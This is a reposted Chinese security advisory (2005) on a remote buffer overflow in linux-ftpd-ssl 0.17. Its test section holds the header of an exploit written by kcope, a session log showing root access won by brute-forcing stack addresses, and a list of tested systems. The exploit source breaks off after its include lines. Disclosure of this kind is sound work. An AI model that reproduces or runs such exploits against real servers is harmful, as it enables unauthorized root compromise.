Linux-FTPD-SSL FTP Server远程缓冲区溢出漏洞
发布日期:2005-11-15
更新日期:2005-11-15
受影响系统:
Gentoo Linux描述:
Christoph Martin linux-ftpd-ssl 0.17
BUGTRAQ ID: 15343
linux-ftpd-ssl是一款支持加密的FTP server。
linux-ftpd-ssl软件包中存在远程溢出漏洞,恶意服务器可能利用此漏洞在主机上执行任意指令。
恶意服务器生成的超长响应命令可能会覆盖栈缓冲区。拥有创建可通过FTP访问目录的攻击者可以利用这个漏洞以root用户权限在本地机器上执行任意代码。
<*来源:kcope (kingcope@gmx.net)
链接:http://www.gentoo.org/security/en/glsa/glsa-200511-11.xml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/**********************************************************/
/** lnxFTPDssl_warez.c **/
/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/
/** for all of those who installed the ssl ready version **/
/** of linux-ftpd to be more "secure" **/
/** **/
/** be aware of the buffer overflows, **/
/** the code is strong cryto **/
/**********************************************************/
/** thanx blackzero,revoguard,wY!,net_spy **/
/** Confidential. Keep Private! **/
/**********************************************************/
/**
C:\Dokumente und Einstellungen\Administrator\Desktop>telnet 192.168.2.9 21
220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
AUTH SSL
234 AUTH SSL OK.
;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpPppPPPPPpPpPPPpP
C:\Dokumente und Einstellungen\Administrator\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password
lnxFTPDssl_warez.c
linux-ftpd-ssl 0.17 remote r00t exploit by kcope
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
USING STACK ADDRESS 0xbfffcc03
USING STACK ADDRESS 0xbfffcc13
USING STACK ADDRESS 0xbfffcc23
USING STACK ADDRESS 0xbfffcc33
USING STACK ADDRESS 0xbfffcc43
USING STACK ADDRESS 0xbfffcc53
USING STACK ADDRESS 0xbfffcc63
USING STACK ADDRESS 0xbfffcc73
USING STACK ADDRESS 0xbfffcc83
USING STACK ADDRESS 0xbfffcc93
USING STACK ADDRESS 0xbfffcca3
USING STACK ADDRESS 0xbfffccb3
USING STACK ADDRESS 0xbfffccc3
USING STACK ADDRESS 0xbfffccd3
USING STACK ADDRESS 0xbfffcce3
USING STACK ADDRESS 0xbfffccf3
USING STACK ADDRESS 0xbfffcd03
USING STACK ADDRESS 0xbfffcd13
USING STACK ADDRESS 0xbfffcd23
USING STACK ADDRESS 0xbfffcd33
USING STACK ADDRESS 0xbfffcd43
USING STACK ADDRESS 0xbfffcd53
USING STACK ADDRESS 0xbfffcd63
USING STACK ADDRESS 0xbfffcd73
USING STACK ADDRESS 0xbfffcd83
USING STACK ADDRESS 0xbfffcd93
USING STACK ADDRESS 0xbfffcda3
USING STACK ADDRESS 0xbfffcdb3
USING STACK ADDRESS 0xbfffcdc3
USING STACK ADDRESS 0xbfffcdd3
USING STACK ADDRESS 0xbfffcde3
USING STACK ADDRESS 0xbfffcdf3
USING STACK ADDRESS 0xbfffce03
USING STACK ADDRESS 0xbfffce13
USING STACK ADDRESS 0xbfffce23
USING STACK ADDRESS 0xbfffce33
USING STACK ADDRESS 0xbfffce43
USING STACK ADDRESS 0xbfffce53
USING STACK ADDRESS 0xbfffce63
USING STACK ADDRESS 0xbfffce73
USING STACK ADDRESS 0xbfffce83
USING STACK ADDRESS 0xbfffce93
USING STACK ADDRESS 0xbfffcea3
USING STACK ADDRESS 0xbfffceb3
USING STACK ADDRESS 0xbfffcec3
Let's get ready to rumble!
id
uid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
**/
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
// CHECK VER3 FOR MORE SUPPORT!!!
// ***KEEP IT ULTRA PRIV8***
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
